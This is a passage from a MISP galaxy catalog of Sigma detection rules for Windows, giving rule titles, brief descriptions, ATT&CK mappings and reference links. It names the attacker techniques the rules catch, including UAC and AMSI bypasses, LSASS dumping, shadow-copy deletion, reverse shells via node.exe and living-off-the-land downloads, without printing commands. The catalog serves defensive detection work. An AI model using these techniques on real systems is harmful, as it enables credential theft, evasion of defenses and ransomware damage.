Detects the execution of REGSVR32.exe with DLL files masquerading as other files

The tag is: misp-galaxy:sigma-rules="Regsvr32 DLL Execution With Suspicious File Extension"

Regsvr32 DLL Execution With Suspicious File Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10598. Table References

Links

https://guides.lib.umich.edu/c.php?g=282942&p=1885348

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml

Remote CHM File Download/Execution Via HH.EXE

Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.

The tag is: misp-galaxy:sigma-rules="Remote CHM File Download/Execution Via HH.EXE"

Remote CHM File Download/Execution Via HH.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

Table 10599. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md

https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml

Suspicious Extrac32 Alternate Data Stream Execution

Extract data from cab file and hide it in an alternate data stream

The tag is: misp-galaxy:sigma-rules="Suspicious Extrac32 Alternate Data Stream Execution"

Suspicious Extrac32 Alternate Data Stream Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10600. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extrac32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml

Suspicious Windows Trace ETW Session Tamper Via Logman.EXE

Detects the execution of "logman" utility in order to disable or delete Windows trace sessions

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Trace ETW Session Tamper Via Logman.EXE"

Suspicious Windows Trace ETW Session Tamper Via Logman.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 10601. Table References

Links

https://twitter.com/0gtweet/status/1359039665232306183?s=21

https://ss64.com/nt/logman.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml

Potential Tampering With Security Products Via WMIC

Detects uninstallation or termination of security products using the WMIC utility

The tag is: misp-galaxy:sigma-rules="Potential Tampering With Security Products Via WMIC"

Potential Tampering With Security Products Via WMIC has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10602. Table References

Links

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/

https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://twitter.com/cglyer/status/1355171195654709249

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml

Audio Capture via PowerShell

Detects audio capture via PowerShell Cmdlet.

The tag is: misp-galaxy:sigma-rules="Audio Capture via PowerShell"

Audio Capture via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 10603. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html

https://github.com/frgnca/AudioDeviceCmdlets

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml

Computer Discovery And Export Via Get-ADComputer Cmdlet

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

The tag is: misp-galaxy:sigma-rules="Computer Discovery And Export Via Get-ADComputer Cmdlet"

Computer Discovery And Export Via Get-ADComputer Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10604. Table References

Links

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml

Arbitrary File Download Via MSPUB.EXE

Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via MSPUB.EXE"

Arbitrary File Download Via MSPUB.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10605. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/238/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mspub_download.yml

Potential Arbitrary Code Execution Via Node.EXE

Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe…​etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks…​etc

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary Code Execution Via Node.EXE"

Potential Arbitrary Code Execution Via Node.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10606. Table References

Links

https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/

https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://nodejs.org/api/cli.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml

UAC Bypass Using ChangePK and SLUI

Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using ChangePK and SLUI"

UAC Bypass Using ChangePK and SLUI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10607. Table References

Links

https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b

https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml

Change Default File Association Via Assoc

Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

The tag is: misp-galaxy:sigma-rules="Change Default File Association Via Assoc"

Change Default File Association Via Assoc has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 10608. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml

Fsutil Behavior Set SymlinkEvaluation

A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt

The tag is: misp-galaxy:sigma-rules="Fsutil Behavior Set SymlinkEvaluation"

Fsutil Behavior Set SymlinkEvaluation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10609. Table References

Links

https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior

https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml

LSASS Process Reconnaissance Via Findstr.EXE

Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID

The tag is: misp-galaxy:sigma-rules="LSASS Process Reconnaissance Via Findstr.EXE"

LSASS Process Reconnaissance Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10610. Table References

Links

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml

Deletion of Volume Shadow Copies via WMI with PowerShell

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

The tag is: misp-galaxy:sigma-rules="Deletion of Volume Shadow Copies via WMI with PowerShell"

Deletion of Volume Shadow Copies via WMI with PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10611. Table References

Links

https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml

HackTool - DInjector PowerShell Cradle Execution

Detects the use of the Dinject PowerShell cradle based on the specific flags

The tag is: misp-galaxy:sigma-rules="HackTool - DInjector PowerShell Cradle Execution"

HackTool - DInjector PowerShell Cradle Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10612. Table References

Links

https://github.com/snovvcrash/DInjector

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml

Hacktool Execution - Imphash

Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

The tag is: misp-galaxy:sigma-rules="Hacktool Execution - Imphash"

Hacktool Execution - Imphash has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10613. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml

Invoke-Obfuscation VAR+ Launcher

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher"

Invoke-Obfuscation VAR+ Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10614. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml

Uncommon Child Processes Of SndVol.exe

Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)

The tag is: misp-galaxy:sigma-rules="Uncommon Child Processes Of SndVol.exe"

Table 10615. Table References

Links

https://twitter.com/Max_Mal_/status/1661322732456353792

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml

Suspicious Electron Application Child Processes

Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)

The tag is: misp-galaxy:sigma-rules="Suspicious Electron Application Child Processes"

Table 10616. Table References

Links

https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf

https://lolbas-project.github.io/lolbas/Binaries/Teams/

https://github.com/mttaggart/quasar

https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/

https://lolbas-project.github.io/lolbas/Binaries/Msedge/

https://taggart-tech.com/quasar-electron/

https://positive.security/blog/ms-officecmd-rce

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml

Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that’s located in a potentially suspicious location to run for a specific VM state

The tag is: misp-galaxy:sigma-rules="Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script"

Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10617. Table References

Links

https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml

Potential Persistence Via Powershell Search Order Hijacking - Task

Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Powershell Search Order Hijacking - Task"

Potential Persistence Via Powershell Search Order Hijacking - Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10618. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml

HackTool - PCHunter Execution

Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff

The tag is: misp-galaxy:sigma-rules="HackTool - PCHunter Execution"

HackTool - PCHunter Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 10619. Table References

Links

https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/

http://www.xuetr.com/

https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml

Invoke-Obfuscation STDIN+ Launcher

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher"

Invoke-Obfuscation STDIN+ Launcher has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10620. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml

Local Accounts Discovery

Local accounts, System Owner/User discovery using operating systems utilities

The tag is: misp-galaxy:sigma-rules="Local Accounts Discovery"

Local Accounts Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 10621. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml

File Download Via Windows Defender MpCmpRun.EXE

Detects the use of Windows Defender MpCmdRun.EXE to download files

The tag is: misp-galaxy:sigma-rules="File Download Via Windows Defender MpCmpRun.EXE"

File Download Via Windows Defender MpCmpRun.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10622. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml

Arbitrary Shell Command Execution Via Settingcontent-Ms

The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.

The tag is: misp-galaxy:sigma-rules="Arbitrary Shell Command Execution Via Settingcontent-Ms"

Arbitrary Shell Command Execution Via Settingcontent-Ms has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10623. Table References

Links

https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml

New Process Created Via Wmic.EXE

Detects new process creation using WMIC via the "process call create" flag

The tag is: misp-galaxy:sigma-rules="New Process Created Via Wmic.EXE"

New Process Created Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10624. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process

https://www.sans.org/blog/wmic-for-incident-response/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml

Suspicious IIS URL GlobalRules Rewrite Via AppCmd

Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.

The tag is: misp-galaxy:sigma-rules="Suspicious IIS URL GlobalRules Rewrite Via AppCmd"

Table 10625. Table References

Links

https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r

https://twitter.com/malmoeb/status/1616702107242971144

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml

Potential AMSI Bypass Via .NET Reflection

Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning

The tag is: misp-galaxy:sigma-rules="Potential AMSI Bypass Via .NET Reflection"

Potential AMSI Bypass Via .NET Reflection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10626. Table References

Links

https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml

Reg Add Suspicious Paths

Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys

The tag is: misp-galaxy:sigma-rules="Reg Add Suspicious Paths"

Reg Add Suspicious Paths has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10627. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml

Malicious PE Execution by Microsoft Visual Studio Debugger

There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.

The tag is: misp-galaxy:sigma-rules="Malicious PE Execution by Microsoft Visual Studio Debugger"

Malicious PE Execution by Microsoft Visual Studio Debugger has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10628. Table References

Links

https://twitter.com/pabraeken/status/990758590020452353

https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml

Schtasks From Suspicious Folders

Detects scheduled task creations that have suspicious action command and folder combinations

The tag is: misp-galaxy:sigma-rules="Schtasks From Suspicious Folders"

Schtasks From Suspicious Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10629. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml

Delete All Scheduled Tasks

Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

The tag is: misp-galaxy:sigma-rules="Delete All Scheduled Tasks"

Delete All Scheduled Tasks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10630. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml

Detects events that appear when a user click on a link file with a powershell command in it

The tag is: misp-galaxy:sigma-rules="Hidden Powershell in Link File Pattern"

Hidden Powershell in Link File Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10631. Table References

Links

https://www.x86matthew.com/view_post?id=embed_exe_lnk

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml

Node Process Executions

Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud

The tag is: misp-galaxy:sigma-rules="Node Process Executions"

Node Process Executions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10632. Table References

Links

https://twitter.com/mttaggart/status/1511804863293784064

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml

Potential CobaltStrike Process Patterns

Detects potential process patterns related to Cobalt Strike beacon activity

The tag is: misp-galaxy:sigma-rules="Potential CobaltStrike Process Patterns"

Potential CobaltStrike Process Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10633. Table References

Links

https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml

Process Memory Dump via RdrLeakDiag.EXE

Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory

The tag is: misp-galaxy:sigma-rules="Process Memory Dump via RdrLeakDiag.EXE"

Process Memory Dump via RdrLeakDiag.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10635. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://twitter.com/0gtweet/status/1299071304805560321?s=21

https://www.pureid.io/dumping-abusing-windows-credentials-part-1/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml

Suspicious Download From Direct IP Via Bitsadmin

Detects usage of bitsadmin downloading a file using an URL that contains an IP

The tag is: misp-galaxy:sigma-rules="Suspicious Download From Direct IP Via Bitsadmin"

Suspicious Download From Direct IP Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10636. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml

PsExec Service Child Process Execution as LOCAL SYSTEM

Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)

The tag is: misp-galaxy:sigma-rules="PsExec Service Child Process Execution as LOCAL SYSTEM"

Table 10637. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml

Suspicious Mshta.EXE Execution Patterns

Detects suspicious mshta process execution patterns

The tag is: misp-galaxy:sigma-rules="Suspicious Mshta.EXE Execution Patterns"

Suspicious Mshta.EXE Execution Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 10638. Table References

Links

https://www.echotrail.io/insights/search/mshta.exe

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://en.wikipedia.org/wiki/HTML_Application

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml

Suspicious File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious

The tag is: misp-galaxy:sigma-rules="Suspicious File Encoded To Base64 Via Certutil.EXE"

Suspicious File Encoded To Base64 Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10639. Table References

Links

https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior

https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior

https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior

https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml

Dynamic .NET Compilation Via Csc.EXE

